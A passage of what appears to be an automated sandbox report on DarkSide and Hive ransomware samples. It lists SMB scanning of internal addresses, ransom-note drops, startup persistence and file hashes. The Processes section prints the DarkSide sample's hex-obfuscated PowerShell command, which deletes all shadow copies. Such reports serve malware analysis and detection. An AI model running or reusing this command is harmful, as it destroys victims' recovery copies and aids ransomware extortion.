| N/A | 10.127.0.135:445 | tcp | |
| N/A | 10.127.0.105:445 | tcp | |
| N/A | 10.127.0.140:445 | tcp | |
| N/A | 10.127.0.120:445 | tcp | |
| N/A | 10.127.0.104:445 | tcp | |
| N/A | 10.127.0.138:445 | tcp | |
| N/A | 10.127.0.157:445 | tcp | |
| N/A | 10.127.0.172:445 | tcp | |
| N/A | 10.127.0.170:445 | tcp | |
| N/A | 10.127.0.159:445 | tcp | |
| N/A | 10.127.0.160:445 | tcp | |
| N/A | 10.127.0.162:445 | tcp | |
| N/A | 10.127.0.156:445 | tcp | |
| N/A | 10.127.0.169:445 | tcp | |
| N/A | 10.127.0.122:445 | tcp | |
| N/A | 10.127.0.147:445 | tcp | |
| N/A | 10.127.0.164:445 | tcp | |
| N/A | 10.127.0.119:445 | tcp | |
| N/A | 10.127.0.123:445 | tcp | |
| N/A | 10.127.0.146:445 | tcp | |
| N/A | 10.127.0.165:445 | tcp | |
| N/A | 10.127.0.141:445 | tcp | |
| N/A | 10.127.0.145:445 | tcp | |
| N/A | 10.127.0.148:445 | tcp | |
| N/A | 10.127.0.174:445 | tcp | |
| N/A | 10.127.0.132:445 | tcp | |
| N/A | 10.127.0.125:445 | tcp | |
| N/A | 10.127.0.117:445 | tcp | |
| N/A | 10.127.0.142:445 | tcp | |
| N/A | 10.127.0.103:445 | tcp | |
| N/A | 10.127.0.137:445 | tcp | |
| N/A | 10.127.0.144:445 | tcp | |
| N/A | 10.127.0.133:445 | tcp | |
| N/A | 10.127.0.151:445 | tcp | |
| N/A | 10.127.0.143:445 | tcp | |
| N/A | 10.127.0.129:445 | tcp | |
| N/A | 10.127.0.171:445 | tcp | |
| N/A | 10.127.0.121:445 | tcp | |
| N/A | 10.127.0.149:445 | tcp | |
| N/A | 10.127.0.163:445 | tcp | |
| N/A | 10.127.0.130:445 | tcp | |
| N/A | 10.127.0.166:445 | tcp | |
| N/A | 10.127.0.168:445 | tcp | |
| N/A | 10.127.0.177:445 | tcp | |
| N/A | 10.127.0.124:445 | tcp | |
| N/A | 10.127.0.150:445 | tcp | |
| N/A | 10.127.0.118:445 | tcp | |
| N/A | 10.127.0.134:445 | tcp | |
| N/A | 10.127.0.220:445 | tcp | |
| N/A | 10.127.0.187:445 | tcp | |
| N/A | 10.127.0.230:445 | tcp | |
| N/A | 10.127.0.206:445 | tcp | |
| N/A | 10.127.0.210:445 | tcp | |
| N/A | 10.127.0.212:445 | tcp | |
| N/A | 10.127.0.233:445 | tcp | |
| N/A | 10.127.0.192:445 | tcp | |
| N/A | 10.127.0.213:445 | tcp | |
| N/A | 10.127.0.181:445 | tcp | |
| N/A | 10.127.0.188:445 | tcp | |
| N/A | 10.127.0.200:445 | tcp | |
| N/A | 10.127.0.238:445 | tcp | |
| N/A | 10.127.0.243:445 | tcp | |
| N/A | 10.127.0.222:445 | tcp | |
| N/A | 10.127.0.209:445 | tcp | |
| N/A | 10.127.0.186:445 | tcp | |
| N/A | 10.127.0.242:445 | tcp | |
| N/A | 10.127.0.248:445 | tcp | |
| N/A | 10.127.0.198:445 | tcp | |
| N/A | 10.127.0.240:445 | tcp | |
| N/A | 10.127.0.201:445 | tcp | |
| N/A | 10.127.0.245:445 | tcp | |
| N/A | 10.127.0.217:445 | tcp | |
| N/A | 10.127.0.241:445 | tcp | |
| N/A | 10.127.0.182:445 | tcp | |
| N/A | 10.127.0.185:445 | tcp | |
| N/A | 10.127.0.196:445 | tcp | |
| N/A | 10.127.0.246:445 | tcp | |
| N/A | 10.127.0.211:445 | tcp | |
| N/A | 10.127.0.215:445 | tcp | |
| N/A | 10.127.0.227:445 | tcp | |
| N/A | 10.127.0.204:445 | tcp | |
| N/A | 10.127.0.216:445 | tcp | |
| N/A | 10.127.0.223:445 | tcp | |
| N/A | 10.127.0.189:445 | tcp | |
| N/A | 10.127.0.224:445 | tcp | |
| N/A | 10.127.0.231:445 | tcp | |
| N/A | 10.127.0.195:445 | tcp | |
| N/A | 10.127.0.203:445 | tcp | |
| N/A | 10.127.0.208:445 | tcp | |
| N/A | 10.127.0.207:445 | tcp | |
| N/A | 10.127.0.218:445 | tcp | |
| N/A | 10.127.0.190:445 | tcp | |
| N/A | 10.127.0.219:445 | tcp | |
| N/A | 10.127.0.228:445 | tcp | |
| N/A | 10.127.0.184:445 | tcp | |
| N/A | 10.127.0.214:445 | tcp | |
| N/A | 10.127.0.191:445 | tcp | |
| N/A | 10.127.0.199:445 | tcp | |
| N/A | 10.127.0.183:445 | tcp | |
| N/A | 10.127.0.225:445 | tcp | |
| N/A | 10.127.0.202:445 | tcp | |
| N/A | 10.127.0.205:445 | tcp | |
| N/A | 10.127.0.234:445 | tcp | |
| N/A | 10.127.0.237:445 | tcp | |
| N/A | 10.127.0.229:445 | tcp | |
| N/A | 10.127.0.226:445 | tcp | |
| N/A | 10.127.0.239:445 | tcp | |
| N/A | 10.127.0.236:445 | tcp | |
| N/A | 10.127.0.193:445 | tcp | |
| N/A | 10.127.0.197:445 | tcp | |
| N/A | 10.127.0.194:445 | tcp | |
| N/A | 10.127.0.221:445 | tcp | |
| N/A | 10.127.0.235:445 | tcp | |
| N/A | 10.127.0.244:445 | tcp | |
| N/A | 10.127.0.250:445 | tcp | |
| N/A | 10.127.0.249:445 | tcp | |
| N/A | 10.127.0.254:445 | tcp | |
| N/A | 10.127.0.247:445 | tcp | |
| N/A | 10.127.0.253:445 | tcp | |
| N/A | 10.127.255.49:445 | tcp | |
| N/A | 10.127.255.5:445 | tcp | |
| N/A | 10.127.255.25:445 | tcp | |
| N/A | 10.127.255.33:445 | tcp | |
| N/A | 10.127.255.51:445 | tcp | |
| N/A | 10.127.255.54:445 | tcp | |
| N/A | 10.127.255.23:445 | tcp | |
| N/A | 10.127.255.50:445 | tcp | |
| N/A | 10.127.255.14:445 | tcp | |
| N/A | 10.127.255.1:445 | tcp | |
| N/A | 10.127.255.18:445 | tcp | |
| N/A | 10.127.255.7:445 | tcp | |
| N/A | 10.127.255.8:445 | tcp | |
| N/A | 10.127.255.16:445 | tcp | |
| N/A | 10.127.255.37:445 | tcp | |
| N/A | 10.127.255.190:445 | tcp | |
| N/A | 10.127.255.46:445 | tcp | |
| N/A | 10.127.255.6:445 | tcp | |
| N/A | 10.127.255.38:445 | tcp | |
| N/A | 10.127.255.39:445 | tcp | |
| N/A | 10.127.255.42:445 | tcp | |
| N/A | 10.127.255.17:445 | tcp | |
| N/A | 10.127.255.29:445 | tcp | |
| N/A | 10.127.255.43:445 | tcp | |
| N/A | 10.127.255.60:445 | tcp | |
| N/A | 10.127.255.47:445 | tcp | |
| N/A | 10.127.255.31:445 | tcp | |
| N/A | 10.127.255.61:445 | tcp | |
| N/A | 10.127.255.32:445 | tcp | |
| N/A | 10.127.255.44:445 | tcp | |
| N/A | 10.127.255.26:445 | tcp | |
| N/A | 10.127.255.40:445 | tcp | |
| N/A | 10.127.255.56:445 | tcp | |
| N/A | 10.127.255.15:445 | tcp | |
| N/A | 10.127.255.12:445 | tcp | |
| N/A | 10.127.255.24:445 | tcp | |
| N/A | 10.127.255.41:445 | tcp | |
| N/A | 10.127.255.28:445 | tcp | |
| N/A | 10.127.255.36:445 | tcp | |
| N/A | 10.127.255.3:445 | tcp | |
| N/A | 10.127.255.30:445 | tcp | |
| N/A | 10.127.255.9:445 | tcp | |
| N/A | 10.127.255.2:445 | tcp | |
| N/A | 10.127.255.45:445 | tcp | |
| N/A | 10.127.255.53:445 | tcp | |
| N/A | 10.127.255.57:445 | tcp | |
| N/A | 10.127.255.4:445 | tcp | |
| N/A | 10.127.255.11:445 | tcp | |
| N/A | 10.127.255.21:445 | tcp | |
| N/A | 10.127.255.22:445 | tcp | |
| N/A | 10.127.255.27:445 | tcp | |
| N/A | 10.127.255.55:445 | tcp | |
| N/A | 10.127.255.0:445 | tcp | |
| N/A | 10.127.255.10:445 | tcp | |
| N/A | 10.127.255.58:445 | tcp | |
| N/A | 10.127.255.19:445 | tcp | |
| N/A | 10.127.255.62:445 | tcp | |
| N/A | 10.127.255.20:445 | tcp | |
| N/A | 10.127.255.63:445 | tcp | |
| N/A | 10.127.255.35:445 | tcp | |
| N/A | 10.127.255.34:445 | tcp | |
| N/A | 10.127.255.52:445 | tcp | |
| N/A | 10.127.255.59:445 | tcp | |
| N/A | 10.127.255.13:445 | tcp | |
| N/A | 10.127.255.64:445 | tcp | |
| N/A | 10.127.255.48:445 | tcp | |
| N/A | 10.127.255.80:445 | tcp | |
| N/A | 10.127.255.116:445 | tcp | |
| N/A | 10.127.255.75:445 | tcp | |
| N/A | 10.127.255.91:445 | tcp | |
| N/A | 10.127.255.103:445 | tcp | |
| N/A | 10.127.255.123:445 | tcp | |
| N/A | 10.127.255.82:445 | tcp | |
| N/A | 10.127.255.94:445 | tcp | |
| N/A | 10.127.255.129:445 | tcp | |
| N/A | 10.127.255.114:445 | tcp | |
| N/A | 10.127.255.122:445 | tcp | |
| N/A | 10.127.255.124:445 | tcp | |
| N/A | 10.127.255.85:445 | tcp | |
| N/A | 10.127.255.68:445 | tcp | |
| N/A | 10.127.255.69:445 | tcp | |
| N/A | 10.127.255.86:445 | tcp | |
| N/A | 10.127.255.99:445 | tcp | |
| N/A | 10.127.255.117:445 | tcp | |
| N/A | 10.127.255.101:445 | tcp | |
| N/A | 10.127.255.113:445 | tcp | |
| N/A | 10.127.255.110:445 | tcp | |
| N/A | 10.127.255.74:445 | tcp | |
| N/A | 10.127.255.127:445 | tcp | |
| N/A | 10.127.255.84:445 | tcp | |
| N/A | 10.127.255.125:445 | tcp | |
| N/A | 10.127.255.87:445 | tcp | |
| N/A | 10.127.255.66:445 | tcp | |
| N/A | 10.127.255.107:445 | tcp | |
| N/A | 10.127.255.121:445 | tcp | |
| N/A | 10.127.255.96:445 | tcp | |
| N/A | 10.127.255.70:445 | tcp | |
| N/A | 10.127.255.81:445 | tcp | |
| N/A | 10.127.255.90:445 | tcp | |
| N/A | 10.127.255.100:445 | tcp | |
| N/A | 10.127.255.105:445 | tcp | |
| N/A | 10.127.255.95:445 | tcp | |
| N/A | 10.127.255.93:445 | tcp | |
| N/A | 10.127.255.72:445 | tcp | |
| N/A | 10.127.255.104:445 | tcp | |
| N/A | 10.127.255.65:445 | tcp | |
| N/A | 10.127.255.97:445 | tcp | |
| N/A | 10.127.255.106:445 | tcp | |
| N/A | 10.127.255.73:445 | tcp | |
| N/A | 10.127.255.98:445 | tcp | |
| N/A | 10.127.255.126:445 | tcp | |
| N/A | 10.127.255.128:445 | tcp | |
| N/A | 10.127.255.92:445 | tcp | |
| N/A | 10.127.255.115:445 | tcp | |
| N/A | 10.127.255.108:445 | tcp | |
| N/A | 10.127.255.88:445 | tcp | |
| N/A | 10.127.255.79:445 | tcp | |
| N/A | 10.127.255.89:445 | tcp | |
| N/A | 10.127.255.119:445 | tcp | |
| N/A | 10.127.255.102:445 | tcp | |
| N/A | 10.127.255.109:445 | tcp | |
| N/A | 10.127.255.112:445 | tcp | |
| N/A | 10.127.255.120:445 | tcp | |
| N/A | 10.127.255.67:445 | tcp | |
| N/A | 10.127.255.76:445 | tcp | |
| N/A | 10.127.255.71:445 | tcp | |
| N/A | 10.127.255.77:445 | tcp | |
| N/A | 10.127.255.192:445 | tcp | |
| N/A | 10.127.255.78:445 | tcp | |
| N/A | 10.127.255.83:445 | tcp | |
| N/A | 10.127.255.118:445 | tcp | |
| N/A | 10.127.255.111:445 | tcp | |
| N/A | 10.127.255.176:445 | tcp | |
| N/A | 10.127.255.137:445 | tcp | |
| N/A | 10.127.255.165:445 | tcp | |
| N/A | 10.127.255.141:445 | tcp | |
| N/A | 10.127.255.154:445 | tcp | |
| N/A | 10.127.255.131:445 | tcp | |
| N/A | 10.127.255.193:445 | tcp | |
| N/A | 10.127.255.180:445 | tcp | |
| N/A | 10.127.255.188:445 | tcp | |
| N/A | 10.127.255.195:445 | tcp | |
| N/A | 10.127.255.132:445 | tcp | |
| N/A | 10.127.255.162:445 | tcp | |
| N/A | 10.127.255.179:445 | tcp | |
| N/A | 10.127.255.157:445 | tcp | |
| N/A | 10.127.255.185:445 | tcp | |
| N/A | 10.127.255.196:445 | tcp | |
| N/A | 10.127.255.149:445 | tcp | |
| N/A | 10.127.255.164:445 | tcp | |
| N/A | 10.127.255.171:445 | tcp | |
| N/A | 10.127.255.173:445 | tcp | |
| N/A | 10.127.255.142:445 | tcp | |
| N/A | 10.127.255.183:445 | tcp | |
| N/A | 10.127.255.138:445 | tcp | |
| N/A | 10.127.255.151:445 | tcp | |
| N/A | 10.127.255.174:445 | tcp | |
| N/A | 10.127.255.169:445 | tcp | |
| N/A | 10.127.255.182:445 | tcp | |
| N/A | 10.127.255.146:445 | tcp | |
| N/A | 10.127.255.172:445 | tcp | |
| N/A | 10.127.255.175:445 | tcp | |
| N/A | 10.127.255.177:445 | tcp | |
| N/A | 10.127.255.140:445 | tcp | |
| N/A | 10.127.255.143:445 | tcp | |
| N/A | 10.127.255.156:445 | tcp | |
| N/A | 10.127.255.136:445 | tcp | |
| N/A | 10.127.255.145:445 | tcp | |
| N/A | 10.127.255.184:445 | tcp | |
| N/A | 10.127.255.187:445 | tcp | |
| N/A | 10.127.255.148:445 | tcp | |
| N/A | 10.127.255.130:445 | tcp | |
| N/A | 10.127.255.181:445 | tcp | |
| N/A | 10.127.255.139:445 | tcp | |
| N/A | 10.127.255.152:445 | tcp | |
| N/A | 10.127.255.170:445 | tcp | |
| N/A | 10.127.255.163:445 | tcp | |
| N/A | 10.127.255.155:445 | tcp | |
| N/A | 10.127.255.189:445 | tcp | |
| N/A | 10.127.255.160:445 | tcp | |
| N/A | 10.127.255.194:445 | tcp | |
| N/A | 10.127.255.186:445 | tcp | |
| N/A | 10.127.255.144:445 | tcp | |
| N/A | 10.127.255.166:445 | tcp | |
| N/A | 10.127.255.135:445 | tcp | |
| N/A | 10.127.255.134:445 | tcp | |
| N/A | 10.127.255.147:445 | tcp | |
| N/A | 10.127.255.133:445 | tcp | |
| N/A | 10.127.255.150:445 | tcp | |
| N/A | 10.127.255.158:445 | tcp | |
| N/A | 10.127.255.178:445 | tcp | |
| N/A | 10.127.255.191:445 | tcp | |
| N/A | 10.127.255.167:445 | tcp | |
| N/A | 10.127.255.161:445 | tcp | |
| N/A | 10.127.255.168:445 | tcp | |
| N/A | 10.127.255.153:445 | tcp | |
| N/A | 10.127.255.159:445 | tcp | |
| N/A | 10.127.255.214:445 | tcp | |
| N/A | 10.127.255.228:445 | tcp | |
| N/A | 10.127.255.201:445 | tcp | |
| N/A | 10.127.255.246:445 | tcp | |
| N/A | 10.127.255.207:445 | tcp | |
| N/A | 10.127.255.236:445 | tcp | |
| N/A | 10.127.255.203:445 | tcp | |
| N/A | 10.127.255.244:445 | tcp | |
| N/A | 10.127.255.247:445 | tcp | |
| N/A | 10.127.255.204:445 | tcp | |
| N/A | 10.127.255.208:445 | tcp | |
| N/A | 10.127.255.212:445 | tcp | |
| N/A | 10.127.255.205:445 | tcp | |
| N/A | 10.127.255.243:445 | tcp | |
| N/A | 10.127.255.254:445 | tcp | |
| N/A | 10.127.255.233:445 | tcp | |
| N/A | 10.127.255.238:445 | tcp | |
| N/A | 10.127.255.226:445 | tcp | |
| N/A | 10.127.255.239:445 | tcp | |
| N/A | 10.127.255.237:445 | tcp | |
| N/A | 10.127.255.229:445 | tcp | |
| N/A | 10.127.255.198:445 | tcp | |
| N/A | 10.127.255.230:445 | tcp | |
| N/A | 10.127.255.245:445 | tcp | |
| N/A | 10.127.255.200:445 | tcp | |
| N/A | 10.127.255.242:445 | tcp | |
| N/A | 10.127.255.231:445 | tcp | |
| N/A | 10.127.255.209:445 | tcp | |
| N/A | 10.127.255.210:445 | tcp | |
| N/A | 10.127.255.211:445 | tcp | |
| N/A | 10.127.255.215:445 | tcp | |
| N/A | 10.127.255.252:445 | tcp | |
| N/A | 10.127.255.225:445 | tcp | |
| N/A | 10.127.255.253:445 | tcp | |
| N/A | 10.127.255.241:445 | tcp | |
| N/A | 10.127.255.220:445 | tcp | |
| N/A | 10.127.255.250:445 | tcp | |
| N/A | 10.127.255.213:445 | tcp | |
| N/A | 10.127.255.248:445 | tcp | |
| N/A | 10.127.255.199:445 | tcp | |
| N/A | 10.127.255.217:445 | tcp | |
| N/A | 10.127.255.227:445 | tcp | |
| N/A | 10.127.255.222:445 | tcp | |
| N/A | 10.127.255.216:445 | tcp | |
| N/A | 10.127.255.251:445 | tcp | |
| N/A | 10.127.255.223:445 | tcp | |
| N/A | 10.127.255.249:445 | tcp | |
| N/A | 10.127.255.218:445 | tcp | |
| N/A | 10.127.255.197:445 | tcp | |
| N/A | 10.127.255.224:445 | tcp | |
| N/A | 10.127.255.235:445 | tcp | |
| N/A | 10.127.255.206:445 | tcp | |
| N/A | 10.127.255.202:445 | tcp | |
| N/A | 10.127.255.232:445 | tcp | |
| N/A | 10.127.255.219:445 | tcp | |
| N/A | 10.127.255.234:445 | tcp | |
| N/A | 10.127.255.221:445 | tcp | |
| N/A | 10.127.255.240:445 | tcp | |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.73.42.20.in-addr.arpa | udp |
Files
C:\ProgramData\R3ADM3.txt
| MD5 | e6f001fc98cb51a0429ca5dc95f6a950 |
| SHA1 | 16a73b95d0b5408fa95c97bc9f314f1eff4902b4 |
| SHA256 | acf1bb83790c25806dd3c29e0b453002397c7fe7abc25a3470ae4e3164f9f31b |
| SHA512 | 11e65ed0e80aedb497ab40edf5d3f756b121527cb1102408cdd9f146549c849a41a16fc908bb284c920b061c6b37723117b929de150a62cd61273c40e660168c |
Analysis: behavioral22
Detonation Overview
Submitted
2024-07-07 14:07
Reported
2024-07-07 14:38
Platform
win10v2004-20240704-en
Max time kernel
1699s
Max time network
1164s
Command Line
Signatures
DarkSide
Renames multiple (164) files with added filename extension
Reads user/profile data of web browsers
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4052 wrote to memory of 3124 | N/A | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 4052 wrote to memory of 3124 | N/A | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Uses Volume Shadow Copy service COM API
Processes
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_18_11_2020_17KB.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 17.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 101.58.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 107.12.20.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.144.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.179.89.13.in-addr.arpa | udp |
Files
memory/4052-0-0x0000000000910000-0x0000000000920000-memory.dmp
memory/3124-1-0x00007FFB937C3000-0x00007FFB937C5000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5lmzo3zz.2x1.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3124-8-0x000002BEB2E10000-0x000002BEB2E32000-memory.dmp
memory/3124-12-0x00007FFB937C0000-0x00007FFB94281000-memory.dmp
memory/3124-15-0x00007FFB937C0000-0x00007FFB94281000-memory.dmp
C:\Users\README.6f83c4b2.TXT
| MD5 | 25d0b19a0ec34a39dfa3e177866f01a3 |
| SHA1 | a3704d1f6499738ccd694bdd6008a850c6b2e453 |
| SHA256 | f030ee74e406acb06d43e73c5127df0206e8affc85b95e9895b100d89391dea8 |
| SHA512 | ede7562f04b5f9abf792196ae87d82e14d651dc70e9a5b5ec0e9cb14d13aba27f8ebfacda2191de48dff882131dfad8c7bad51e7fb89b71dd3bbe748adc77198 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 556084f2c6d459c116a69d6fedcc4105 |
| SHA1 | 633e89b9a1e77942d822d14de6708430a3944dbc |
| SHA256 | 88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8 |
| SHA512 | 0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e |
memory/4052-26-0x0000000000910000-0x0000000000920000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 7bd0d74ff0bb98e8751cae71652ed62e |
| SHA1 | caff8e2a964e2900fbe38a3f243499c126b3d4e4 |
| SHA256 | 64c6fad7f8c73c79d9c041118f7fef91738366bc17ff7f8cee2876dacbc25113 |
| SHA512 | df72f1960f1fddf04497e38afee3a40ab8ed7f9fd9d701b83ef2e1cbd63530447f596297acbc215abef7ae08cdd381dc6dcf1e1f5ffdbfa25d82ab357bf68892 |
memory/4052-54-0x0000000000910000-0x0000000000920000-memory.dmp
memory/4052-230-0x0000000000910000-0x0000000000920000-memory.dmp
memory/4052-237-0x0000000000910000-0x0000000000920000-memory.dmp
Analysis: behavioral27
Detonation Overview
Submitted
2024-07-07 14:07
Reported
2024-07-07 16:12
Platform
win7-20240704-en
Max time kernel
1563s
Max time network
1690s
Command Line
Signatures
Detects Go variant of Hive Ransomware
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Hive
Deletes shadow copies
Drops file in Drivers directory
Boot or Logon Autostart Execution: Print Processors
| Description | Indicator | Process | Target |
| File created | C:\Windows\System32\spool\prtprocs\x64\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\spool\prtprocs\x64\de-DE\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\spool\prtprocs\x64\en-US\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\spool\prtprocs\x64\es-ES\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\spool\prtprocs\x64\fr-FR\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\spool\prtprocs\x64\it-IT\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Windows\System32\spool\prtprocs\x64\ja-JP\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini.-uYcD1toMB6z-bE3g_VWOQ7EUj-WNiccrn6Rqkkqn3Q.hive | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe | N/A |
Reads user/profile data of web browsers
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
